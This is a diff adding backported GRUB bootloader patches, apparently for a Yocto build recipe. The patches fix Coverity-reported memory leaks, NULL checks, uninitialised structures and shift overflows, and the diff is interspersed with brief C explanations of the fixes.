+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=03477085f9a33789ba6cca7cd49ab9326a1baa0e]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ conf/Makefile.extra-dist | 1 +
+ .../gnulib-patches/fix-regcomp-uninit-token.patch | 15 +++++++++++++++
+ 2 files changed, 16 insertions(+)
+ create mode 100644 grub-core/lib/gnulib-patches/fix-regcomp-uninit-token.patch
+
+diff --git a/conf/Makefile.extra-dist b/conf/Makefile.extra-dist
+index d27d3a9..ffe6829 100644
+--- a/conf/Makefile.extra-dist
++++ b/conf/Makefile.extra-dist
+@@ -30,6 +30,7 @@ EXTRA_DIST += grub-core/genemuinitheader.sh
+
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-null-deref.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-null-state-deref.patch
++EXTRA_DIST += grub-core/lib/gnulib-patches/fix-regcomp-uninit-token.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-regexec-null-deref.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-uninit-structure.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-unused-value.patch
+diff --git a/grub-core/lib/gnulib-patches/fix-regcomp-uninit-token.patch b/grub-core/lib/gnulib-patches/fix-regcomp-uninit-token.patch
+new file mode 100644
+index 0000000..02e0631
+--- /dev/null
++++ b/grub-core/lib/gnulib-patches/fix-regcomp-uninit-token.patch
+@@ -0,0 +1,15 @@
++--- a/lib/regcomp.c 2020-11-24 17:06:08.159223858 +0000
+++++ b/lib/regcomp.c 2020-11-24 17:06:15.630253923 +0000
++@@ -3808,11 +3808,7 @@
++ create_tree (re_dfa_t *dfa, bin_tree_t *left, bin_tree_t *right,
++ re_token_type_t type)
++ {
++- re_token_t t;
++-#if defined GCC_LINT || defined lint
++- memset (&t, 0, sizeof t);
++-#endif
++- t.type = type;
+++ re_token_t t = { .type = type };
++ return create_token_tree (dfa, left, right, &t);
++ }
++
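The fix above relies on C99 designated-initializer semantics: members not named in the initializer are implicitly zero-initialized, which is what makes the lint-only memset() redundant. A minimal standalone sketch of that behaviour (struct and field names are hypothetical, not gnulib's):

    #include <assert.h>

    struct token
    {
      int type;
      int opr;
      unsigned char word;
    };

    int
    main (void)
    {
      /* Only .type is named; .opr and .word are implicitly zero-initialized.  */
      struct token t = { .type = 42 };

      assert (t.type == 42);
      assert (t.opr == 0 && t.word == 0);
      return 0;
    }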
diff --git a/meta/recipes-bsp/grub/files/0013-io-lzopio-Resolve-unnecessary-self-assignment-errors.patch b/meta/recipes-bsp/grub/files/0013-io-lzopio-Resolve-unnecessary-self-assignment-errors.patch
new file mode 100644
index 0000000000..1190b0d090
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0013-io-lzopio-Resolve-unnecessary-self-assignment-errors.patch
@@ -0,0 +1,41 @@
+From c529ca446424f1a9c64f0007dfe31fa7645d13ac Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Wed, 21 Oct 2020 14:44:10 +0000
+Subject: [PATCH] io/lzopio: Resolve unnecessary self-assignment errors
+
+These 2 assignments are unnecessary since they are just assigning
+to themselves.
+
+Fixes: CID 73643
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=59666e520f44177c97b82a44c169b3b315d63b42]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/io/lzopio.c | 4 ----
+ 1 file changed, 4 deletions(-)
+
+diff --git a/grub-core/io/lzopio.c b/grub-core/io/lzopio.c
+index 3014485..a7d4425 100644
+--- a/grub-core/io/lzopio.c
++++ b/grub-core/io/lzopio.c
+@@ -125,8 +125,6 @@ read_block_header (struct grub_lzopio *lzopio)
+ sizeof (lzopio->block.ucheck)) !=
+ sizeof (lzopio->block.ucheck))
+ return -1;
+-
+- lzopio->block.ucheck = lzopio->block.ucheck;
+ }
+
+ /* Read checksum of compressed data. */
+@@ -143,8 +141,6 @@ read_block_header (struct grub_lzopio *lzopio)
+ sizeof (lzopio->block.ccheck)) !=
+ sizeof (lzopio->block.ccheck))
+ return -1;
+-
+- lzopio->block.ccheck = lzopio->block.ccheck;
+ }
+ }
+
diff --git a/meta/recipes-bsp/grub/files/0014-zstd-Initialize-seq_t-structure-fully.patch b/meta/recipes-bsp/grub/files/0014-zstd-Initialize-seq_t-structure-fully.patch
new file mode 100644
index 0000000000..19d881c1ca
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0014-zstd-Initialize-seq_t-structure-fully.patch
@@ -0,0 +1,34 @@
+From f55ffe6bd8b844a8cd9956702f42ac2eb96ad56f Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Thu, 5 Nov 2020 10:29:59 +0000
+Subject: [PATCH] zstd: Initialize seq_t structure fully
+
+While many compilers will initialize this to zero, not all will, so it
+is better to be sure that fields not being explicitly set are at known
+values, and there is code that checks this field's value elsewhere in the
+code.
+
+Fixes: CID 292440
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=2777cf4466719921dbe4b30af358a75e7d76f217]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/lib/zstd/zstd_decompress.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/grub-core/lib/zstd/zstd_decompress.c b/grub-core/lib/zstd/zstd_decompress.c
+index 711b5b6..e4b5670 100644
+--- a/grub-core/lib/zstd/zstd_decompress.c
++++ b/grub-core/lib/zstd/zstd_decompress.c
+@@ -1325,7 +1325,7 @@ typedef enum { ZSTD_lo_isRegularOffset, ZSTD_lo_isLongOffset=1 } ZSTD_longOffset
+ FORCE_INLINE_TEMPLATE seq_t
+ ZSTD_decodeSequence(seqState_t* seqState, const ZSTD_longOffset_e longOffsets)
+ {
+- seq_t seq;
++ seq_t seq = {0};
+ U32 const llBits = seqState->stateLL.table[seqState->stateLL.state].nbAdditionalBits;
+ U32 const mlBits = seqState->stateML.table[seqState->stateML.state].nbAdditionalBits;
+ U32 const ofBits = seqState->stateOffb.table[seqState->stateOffb.state].nbAdditionalBits;
diff --git a/meta/recipes-bsp/grub/files/0015-kern-partition-Check-for-NULL-before-dereferencing-i.patch b/meta/recipes-bsp/grub/files/0015-kern-partition-Check-for-NULL-before-dereferencing-i.patch
new file mode 100644
index 0000000000..af9fcd45cc
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0015-kern-partition-Check-for-NULL-before-dereferencing-i.patch
@@ -0,0 +1,43 @@
+From 0da8ef2e03a8591586b53a29af92d2ace76a04e3 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Fri, 23 Oct 2020 09:49:59 +0000
+Subject: [PATCH] kern/partition: Check for NULL before dereferencing input
+ string
+
+There is the possibility that the value of str comes from an external
+source and continuing to use it before ever checking its validity is
+wrong. So, it needs fixing.
+
+Additionally, drop unneeded part initialization.
+
+Fixes: CID 292444
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=bc9c468a2ce84bc767234eec888b71f1bc744fff]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/kern/partition.c | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/grub-core/kern/partition.c b/grub-core/kern/partition.c
+index e499147..b10a184 100644
+--- a/grub-core/kern/partition.c
++++ b/grub-core/kern/partition.c
+@@ -109,11 +109,14 @@ grub_partition_map_probe (const grub_partition_map_t partmap,
+ grub_partition_t
+ grub_partition_probe (struct grub_disk *disk, const char *str)
+ {
+- grub_partition_t part = 0;
++ grub_partition_t part;
+ grub_partition_t curpart = 0;
+ grub_partition_t tail;
+ const char *ptr;
+
++ if (str == NULL)
++ return 0;
++
+ part = tail = disk->partition;
+
+ for (ptr = str; *ptr;)
diff --git a/meta/recipes-bsp/grub/files/0016-disk-ldm-Make-sure-comp-data-is-freed-before-exiting.patch b/meta/recipes-bsp/grub/files/0016-disk-ldm-Make-sure-comp-data-is-freed-before-exiting.patch
new file mode 100644
index 0000000000..c1687c75d0
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0016-disk-ldm-Make-sure-comp-data-is-freed-before-exiting.patch
@@ -0,0 +1,128 @@
+From 0c5d0fd796e6cafba179321de396681a493c4158 Mon Sep 17 00:00:00 2001
+From: Marco A Benatto <mbenatto@redhat.com>
+Date: Mon, 7 Dec 2020 11:53:03 -0300
+Subject: [PATCH] disk/ldm: Make sure comp data is freed before exiting from
+ make_vg()
+
+Several error handling paths in make_vg() do not free comp data before
+jumping to fail2 label and returning from the function. This will leak
+memory. So, let's fix all issues of that kind.
+
+Fixes: CID 73804
+
+Signed-off-by: Marco A Benatto <mbenatto@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=23e39f50ca7a107f6b66396ed4d177a914dee035]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/disk/ldm.c | 51 ++++++++++++++++++++++++++++++++++++++------
+ 1 file changed, 44 insertions(+), 7 deletions(-)
+
+diff --git a/grub-core/disk/ldm.c b/grub-core/disk/ldm.c
+index 58f8a53..428415f 100644
+--- a/grub-core/disk/ldm.c
++++ b/grub-core/disk/ldm.c
+@@ -554,7 +554,11 @@ make_vg (grub_disk_t disk,
+ comp->segments = grub_calloc (comp->segment_alloc,
+ sizeof (*comp->segments));
+ if (!comp->segments)
+- goto fail2;
++ {
++ grub_free (comp->internal_id);
++ grub_free (comp);
++ goto fail2;
++ }
+ }
+ else
+ {
+@@ -562,7 +566,11 @@ make_vg (grub_disk_t disk,
+ comp->segment_count = 1;
+ comp->segments = grub_malloc (sizeof (*comp->segments));
+ if (!comp->segments)
+- goto fail2;
++ {
++ grub_free (comp->internal_id);
++ grub_free (comp);
++ goto fail2;
++ }
+ comp->segments->start_extent = 0;
+ comp->segments->extent_count = lv->size;
+ comp->segments->layout = 0;
+@@ -574,15 +582,26 @@ make_vg (grub_disk_t disk,
+ comp->segments->layout = GRUB_RAID_LAYOUT_SYMMETRIC_MASK;
+ }
+ else
+- goto fail2;
++ {
++ grub_free (comp->segments);
++ grub_free (comp->internal_id);
++ grub_free (comp);
++ goto fail2;
++ }
+ ptr += *ptr + 1;
+ ptr++;
+ if (!(vblk[i].flags & 0x10))
+- goto fail2;
++ {
++ grub_free (comp->segments);
++ grub_free (comp->internal_id);
++ grub_free (comp);
++ goto fail2;
++ }
+ if (ptr >= vblk[i].dynamic + sizeof (vblk[i].dynamic)
+ || ptr + *ptr + 1 >= vblk[i].dynamic
+ + sizeof (vblk[i].dynamic))
+ {
++ grub_free (comp->segments);
+ grub_free (comp->internal_id);
+ grub_free (comp);
+ goto fail2;
+@@ -592,6 +611,7 @@ make_vg (grub_disk_t disk,
+ if (ptr + *ptr + 1 >= vblk[i].dynamic
+ + sizeof (vblk[i].dynamic))
+ {
++ grub_free (comp->segments);
+ grub_free (comp->internal_id);
+ grub_free (comp);
+ goto fail2;
+@@ -601,7 +621,12 @@ make_vg (grub_disk_t disk,
+ comp->segments->nodes = grub_calloc (comp->segments->node_alloc,
+ sizeof (*comp->segments->nodes));
+ if (!lv->segments->nodes)
+- goto fail2;
++ {
++ grub_free (comp->segments);
++ grub_free (comp->internal_id);
++ grub_free (comp);
++ goto fail2;
++ }
+ }
+
+ if (lv->segments->node_alloc == lv->segments->node_count)
+@@ -611,11 +636,23 @@ make_vg (grub_disk_t disk,
+
+ if (grub_mul (lv->segments->node_alloc, 2, &lv->segments->node_alloc) ||
+ grub_mul (lv->segments->node_alloc, sizeof (*lv->segments->nodes), &sz))
+- goto fail2;
++ {
++ grub_free (comp->segments->nodes);
++ grub_free (comp->segments);
++ grub_free (comp->internal_id);
++ grub_free (comp);
++ goto fail2;
++ }
+
+ t = grub_realloc (lv->segments->nodes, sz);
+ if (!t)
+- goto fail2;
++ {
++ grub_free (comp->segments->nodes);
++ grub_free (comp->segments);
++ grub_free (comp->internal_id);
++ grub_free (comp);
++ goto fail2;
++ }
+ lv->segments->nodes = t;
+ }
+ lv->segments->nodes[lv->segments->node_count].pv = 0;
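The backport keeps the existing "goto fail2" structure and therefore has to repeat the partial-object frees at every early exit. An alternative that avoids the repetition is a dedicated cleanup label inside the allocating function that releases whatever has been built so far; a sketch of that shape, with purely illustrative names rather than the GRUB LDM ones:

    #include <stdlib.h>

    struct comp
    {
      char *internal_id;
      void *segments;
    };

    /* Allocate a component, undoing any partial work on failure.  */
    static struct comp *
    comp_create (size_t nsegments)
    {
      struct comp *c = calloc (1, sizeof (*c));
      if (c == NULL)
        return NULL;

      c->internal_id = malloc (16);
      if (c->internal_id == NULL)
        goto fail;

      c->segments = calloc (nsegments, 8);
      if (c->segments == NULL)
        goto fail;

      return c;

    fail:
      /* free (NULL) is a no-op, so a partially built object is safe here.  */
      free (c->internal_id);
      free (c);
      return NULL;
    }

    int
    main (void)
    {
      struct comp *c = comp_create (4);
      if (c != NULL)
        {
          free (c->segments);
          free (c->internal_id);
          free (c);
        }
      return 0;
    }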
diff --git a/meta/recipes-bsp/grub/files/0017-disk-ldm-If-failed-then-free-vg-variable-too.patch b/meta/recipes-bsp/grub/files/0017-disk-ldm-If-failed-then-free-vg-variable-too.patch
new file mode 100644
index 0000000000..ecdb230f76
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0017-disk-ldm-If-failed-then-free-vg-variable-too.patch
@@ -0,0 +1,28 @@
+From 253485e8df3c9dedac848567e638157530184295 Mon Sep 17 00:00:00 2001
+From: Paulo Flabiano Smorigo <pfsmorigo@canonical.com>
+Date: Mon, 7 Dec 2020 10:07:47 -0300
+Subject: [PATCH] disk/ldm: If failed then free vg variable too
+
+Fixes: CID 73809
+
+Signed-off-by: Paulo Flabiano Smorigo <pfsmorigo@canonical.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=e0b83df5da538d2a38f770e60817b3a4b9d5b4d7]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/disk/ldm.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/grub-core/disk/ldm.c b/grub-core/disk/ldm.c
+index 428415f..54713f4 100644
+--- a/grub-core/disk/ldm.c
++++ b/grub-core/disk/ldm.c
+@@ -199,6 +199,7 @@ make_vg (grub_disk_t disk,
+ {
+ grub_free (vg->uuid);
+ grub_free (vg->name);
++ grub_free (vg);
+ return NULL;
+ }
+ grub_memcpy (vg->uuid, label->group_guid, LDM_GUID_STRLEN);
diff --git a/meta/recipes-bsp/grub/files/0018-disk-ldm-Fix-memory-leak-on-uninserted-lv-references.patch b/meta/recipes-bsp/grub/files/0018-disk-ldm-Fix-memory-leak-on-uninserted-lv-references.patch
new file mode 100644
index 0000000000..26932f674c
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0018-disk-ldm-Fix-memory-leak-on-uninserted-lv-references.patch
@@ -0,0 +1,50 @@
+From 3e1d2f1959acbe5152cdd5818d495f6455d1a158 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Tue, 8 Dec 2020 10:00:51 +0000
+Subject: [PATCH] disk/ldm: Fix memory leak on uninserted lv references
+
+The problem here is that the memory allocated to the variable lv is not
+yet inserted into the list that is being processed at the label fail2.
+
+As we can already see at line 342, which correctly frees lv before going
+to fail2, we should also be doing that at these earlier jumps to fail2.
+
+Fixes: CID 73824
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=156c281a1625dc73fd350530630c6f2d5673d4f6]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/disk/ldm.c | 10 ++++++++--
+ 1 file changed, 8 insertions(+), 2 deletions(-)
+
+diff --git a/grub-core/disk/ldm.c b/grub-core/disk/ldm.c
+index 54713f4..e82e989 100644
+--- a/grub-core/disk/ldm.c
++++ b/grub-core/disk/ldm.c
+@@ -321,7 +321,10 @@ make_vg (grub_disk_t disk,
+ lv->visible = 1;
+ lv->segments = grub_zalloc (sizeof (*lv->segments));
+ if (!lv->segments)
+- goto fail2;
++ {
++ grub_free (lv);
++ goto fail2;
++ }
+ lv->segments->start_extent = 0;
+ lv->segments->type = GRUB_DISKFILTER_MIRROR;
+ lv->segments->node_count = 0;
+@@ -329,7 +332,10 @@ make_vg (grub_disk_t disk,
+ lv->segments->nodes = grub_calloc (lv->segments->node_alloc,
+ sizeof (*lv->segments->nodes));
+ if (!lv->segments->nodes)
+- goto fail2;
++ {
++ grub_free (lv);
++ goto fail2;
++ }
+ ptr = vblk[i].dynamic;
+ if (ptr + *ptr + 1 >= vblk[i].dynamic
+ + sizeof (vblk[i].dynamic))
diff --git a/meta/recipes-bsp/grub/files/0019-disk-cryptodisk-Fix-potential-integer-overflow.patch b/meta/recipes-bsp/grub/files/0019-disk-cryptodisk-Fix-potential-integer-overflow.patch
new file mode 100644
index 0000000000..dd7fda357d
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0019-disk-cryptodisk-Fix-potential-integer-overflow.patch
@@ -0,0 +1,50 @@
+From 2550aaa0c23fdf8b6c54e00c6b838f2e3aa81fe2 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Thu, 21 Jan 2021 11:38:31 +0000
+Subject: [PATCH] disk/cryptodisk: Fix potential integer overflow
+
+The encrypt and decrypt functions expect a grub_size_t. So, we need to
+ensure that the constant bit shift is using grub_size_t rather than
+unsigned int when it is performing the shift.
+
+Fixes: CID 307788
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=a201ad17caa430aa710654fdf2e6ab4c8166f031]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/disk/cryptodisk.c | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/grub-core/disk/cryptodisk.c b/grub-core/disk/cryptodisk.c
+index 5037768..6883f48 100644
+--- a/grub-core/disk/cryptodisk.c
++++ b/grub-core/disk/cryptodisk.c
+@@ -311,10 +311,10 @@ grub_cryptodisk_endecrypt (struct grub_cryptodisk *dev,
+ case GRUB_CRYPTODISK_MODE_CBC:
+ if (do_encrypt)
+ err = grub_crypto_cbc_encrypt (dev->cipher, data + i, data + i,
+- (1U << dev->log_sector_size), iv);
++ ((grub_size_t) 1 << dev->log_sector_size), iv);
+ else
+ err = grub_crypto_cbc_decrypt (dev->cipher, data + i, data + i,
+- (1U << dev->log_sector_size), iv);
++ ((grub_size_t) 1 << dev->log_sector_size), iv);
+ if (err)
+ return err;
+ break;
+@@ -322,10 +322,10 @@ grub_cryptodisk_endecrypt (struct grub_cryptodisk *dev,
+ case GRUB_CRYPTODISK_MODE_PCBC:
+ if (do_encrypt)
+ err = grub_crypto_pcbc_encrypt (dev->cipher, data + i, data + i,
+- (1U << dev->log_sector_size), iv);
++ ((grub_size_t) 1 << dev->log_sector_size), iv);
+ else
+ err = grub_crypto_pcbc_decrypt (dev->cipher, data + i, data + i,
+- (1U << dev->log_sector_size), iv);
++ ((grub_size_t) 1 << dev->log_sector_size), iv);
+ if (err)
+ return err;
+ break;
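The root cause in this patch is that `1U << dev->log_sector_size` is evaluated in 32-bit unsigned arithmetic, so the value is truncated (and the shift is undefined for counts of 32 or more) before it ever reaches the 64-bit grub_size_t parameter. A small sketch of the difference, using uint64_t as a stand-in for grub_size_t; the `& 31` only mirrors what common hardware does with an oversized count so that the example itself stays well defined:

    #include <stdint.h>
    #include <stdio.h>

    int
    main (void)
    {
      unsigned int log_sector_size = 32;          /* hypothetical oversized value */

      /* Shift performed as 32-bit unsigned: the count is effectively reduced,
         so the result bears no relation to the intended sector size.  */
      uint64_t truncated = 1U << (log_sector_size & 31);

      /* Shift performed as 64-bit, as in the backported fix.  */
      uint64_t correct = (uint64_t) 1 << log_sector_size;

      printf ("32-bit shift: %llu, 64-bit shift: %llu\n",
              (unsigned long long) truncated, (unsigned long long) correct);
      return 0;
    }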
diff --git a/meta/recipes-bsp/grub/files/0020-hfsplus-Check-that-the-volume-name-length-is-valid.patch b/meta/recipes-bsp/grub/files/0020-hfsplus-Check-that-the-volume-name-length-is-valid.patch
new file mode 100644
index 0000000000..eb459c547f
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0020-hfsplus-Check-that-the-volume-name-length-is-valid.patch
@@ -0,0 +1,43 @@
+From 7c1813eeec78892fa651046cc224ae4e80d0c94d Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Fri, 23 Oct 2020 17:09:31 +0000
+Subject: [PATCH] hfsplus: Check that the volume name length is valid
+
+HFS+ documentation suggests that the maximum filename and volume name
+length is 255 Unicode characters.
+
+So, when converting from big-endian to little-endian, we should ensure
+that the name of the volume has a length that is between 0 and 255,
+inclusive.
+
+Fixes: CID 73641
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=2298f6e0d951251bb9ca97d891d1bc8b74515f8c]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/fs/hfsplus.c | 9 +++++++++
+ 1 file changed, 9 insertions(+)
+
+diff --git a/grub-core/fs/hfsplus.c b/grub-core/fs/hfsplus.c
+index dae43be..03c3c4c 100644
+--- a/grub-core/fs/hfsplus.c
++++ b/grub-core/fs/hfsplus.c
+@@ -1007,6 +1007,15 @@ grub_hfsplus_label (grub_device_t device, char **label)
+ grub_hfsplus_btree_recptr (&data->catalog_tree, node, ptr);
+
+ label_len = grub_be_to_cpu16 (catkey->namelen);
++
++ /* Ensure that the length is >= 0. */
++ if (label_len < 0)
++ label_len = 0;
++
++ /* Ensure label length is at most 255 Unicode characters. */
++ if (label_len > 255)
++ label_len = 255;
++
+ label_name = grub_calloc (label_len, sizeof (*label_name));
+ if (!label_name)
+ {
diff --git a/meta/recipes-bsp/grub/files/0021-zfs-Fix-possible-negative-shift-operation.patch b/meta/recipes-bsp/grub/files/0021-zfs-Fix-possible-negative-shift-operation.patch
new file mode 100644
index 0000000000..12418858f9
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0021-zfs-Fix-possible-negative-shift-operation.patch
@@ -0,0 +1,42 @@
+From c757779e5d09719666c3b155afd2421978a107bd Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Tue, 24 Nov 2020 16:41:49 +0000
+Subject: [PATCH] zfs: Fix possible negative shift operation
+
+While it is possible for the return value from zfs_log2() to be zero
+(0), it is quite unlikely, given that the previous assignment to blksz
+is shifted up by SPA_MINBLOCKSHIFT (9) before 9 is subtracted at the
+assignment to epbs.
+
+But, while unlikely during a normal operation, it may be that a carefully
+crafted ZFS filesystem could result in a zero (0) value in the
+dn_datablkszsec field, which means that the shift left does nothing
+and assigns zero (0) to blksz, resulting in a negative epbs value.
+
+Fixes: CID 73608
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=a02091834d3e167320d8a262ff04b8e83c5e616d]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/fs/zfs/zfs.c | 5 +++++
+ 1 file changed, 5 insertions(+)
+
+diff --git a/grub-core/fs/zfs/zfs.c b/grub-core/fs/zfs/zfs.c
+index 36d0373..0c42cba 100644
+--- a/grub-core/fs/zfs/zfs.c
++++ b/grub-core/fs/zfs/zfs.c
+@@ -2667,6 +2667,11 @@ dnode_get (dnode_end_t * mdn, grub_uint64_t objnum, grub_uint8_t type,
+ blksz = grub_zfs_to_cpu16 (mdn->dn.dn_datablkszsec,
+ mdn->endian) << SPA_MINBLOCKSHIFT;
+ epbs = zfs_log2 (blksz) - DNODE_SHIFT;
++
++ /* While this should never happen, we should check that epbs is not negative. */
++ if (epbs < 0)
++ epbs = 0;
++
+ blkid = objnum >> epbs;
+ idx = objnum & ((1 << epbs) - 1);
+
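Shifting by a negative count is undefined behaviour in C, so a crafted dn_datablkszsec of zero would make the later `objnum >> epbs` and `1 << epbs` expressions undefined. A stripped-down sketch of the guarded computation; the log2 helper and constants are simplified stand-ins for the ZFS ones:

    #include <stdint.h>
    #include <stdio.h>

    #define SPA_MINBLOCKSHIFT 9
    #define DNODE_SHIFT       9

    /* Simplified integer log2 that, like the helper described in the commit
       message, returns 0 when given 0.  */
    static int
    ilog2 (uint32_t v)
    {
      int r = 0;
      while (v >>= 1)
        r++;
      return r;
    }

    int
    main (void)
    {
      uint16_t dn_datablkszsec = 0;                       /* hostile on-disk value */
      uint32_t blksz = (uint32_t) dn_datablkszsec << SPA_MINBLOCKSHIFT;
      int epbs = ilog2 (blksz) - DNODE_SHIFT;             /* -9 for this input */

      if (epbs < 0)                                       /* the backported clamp */
        epbs = 0;

      uint64_t objnum = 123;
      printf ("blkid=%llu idx=%llu\n",
              (unsigned long long) (objnum >> epbs),
              (unsigned long long) (objnum & ((1ULL << epbs) - 1)));
      return 0;
    }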
diff --git a/meta/recipes-bsp/grub/files/0022-zfs-Fix-resource-leaks-while-constructing-path.patch b/meta/recipes-bsp/grub/files/0022-zfs-Fix-resource-leaks-while-constructing-path.patch
new file mode 100644
index 0000000000..5ded5520e9
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0022-zfs-Fix-resource-leaks-while-constructing-path.patch
@@ -0,0 +1,121 @@
+From 83fdffc07ec4586b375ab36189f255ffbd8f99c2 Mon Sep 17 00:00:00 2001
+From: Paulo Flabiano Smorigo <pfsmorigo@canonical.com>
+Date: Mon, 14 Dec 2020 18:54:49 -0300
+Subject: [PATCH] zfs: Fix resource leaks while constructing path
+
+There are several exit points in dnode_get_path() that are causing possible
+memory leaks.
+
+In the while(1) the correct exit mechanism should not be to do a direct return,
+but to instead break out of the loop, setting err first if it is not already set.
+
+The reason behind this is that the dnode_path is a linked list, and while going
+through this loop, it is being allocated and built up - the only way to
+correctly unravel it is to traverse it, which is what is being done at the end
+of the function outside of the loop.
+
+Several of the existing exit points correctly did a break, but not all, so this
+change makes that more consistent and should resolve the leaking of memory as
+found by Coverity.
+
+Fixes: CID 73741
+
+Signed-off-by: Paulo Flabiano Smorigo <pfsmorigo@canonical.com>
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=89bdab965805e8d54d7f75349024e1a11cbe2eb8]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/fs/zfs/zfs.c | 30 +++++++++++++++++++++---------
+ 1 file changed, 21 insertions(+), 9 deletions(-)
+
+diff --git a/grub-core/fs/zfs/zfs.c b/grub-core/fs/zfs/zfs.c
+index 0c42cba..9087a72 100644
+--- a/grub-core/fs/zfs/zfs.c
++++ b/grub-core/fs/zfs/zfs.c
+@@ -2836,8 +2836,8 @@ dnode_get_path (struct subvolume *subvol, const char *path_in, dnode_end_t *dn,
+
+ if (dnode_path->dn.dn.dn_type != DMU_OT_DIRECTORY_CONTENTS)
+ {
+- grub_free (path_buf);
+- return grub_error (GRUB_ERR_BAD_FILE_TYPE, N_("not a directory"));
++ err = grub_error (GRUB_ERR_BAD_FILE_TYPE, N_("not a directory"));
++ break;
+ }
+ err = zap_lookup (&(dnode_path->dn), cname, &objnum,
+ data, subvol->case_insensitive);
+@@ -2879,11 +2879,18 @@ dnode_get_path (struct subvolume *subvol, const char *path_in, dnode_end_t *dn,
+ << SPA_MINBLOCKSHIFT);
+
+ if (blksz == 0)
+- return grub_error(GRUB_ERR_BAD_FS, "0-sized block");
++ {
++ err = grub_error (GRUB_ERR_BAD_FS, "0-sized block");
++ break;
++ }
+
+ sym_value = grub_malloc (sym_sz);
+ if (!sym_value)
+- return grub_errno;
++ {
++ err = grub_errno;
++ break;
++ }
++
+ for (block = 0; block < (sym_sz + blksz - 1) / blksz; block++)
+ {
+ void *t;
+@@ -2893,7 +2900,7 @@ dnode_get_path (struct subvolume *subvol, const char *path_in, dnode_end_t *dn,
+ if (err)
+ {
+ grub_free (sym_value);
+- return err;
++ break;
+ }
+
+ movesize = sym_sz - block * blksz;
+@@ -2903,6 +2910,8 @@ dnode_get_path (struct subvolume *subvol, const char *path_in, dnode_end_t *dn,
+ grub_memcpy (sym_value + block * blksz, t, movesize);
+ grub_free (t);
+ }
++ if (err)
++ break;
+ free_symval = 1;
+ }
